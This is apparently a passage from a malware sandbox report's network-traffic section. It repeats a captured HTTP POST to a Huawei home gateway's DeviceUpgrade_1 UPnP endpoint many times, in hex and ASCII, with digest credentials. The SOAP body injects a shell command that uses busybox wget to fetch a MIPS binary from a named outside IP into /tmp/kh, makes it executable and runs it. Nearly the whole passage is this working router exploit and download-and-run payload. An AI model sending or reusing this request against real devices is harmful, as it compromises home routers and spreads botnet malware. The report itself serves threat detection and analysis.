-l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 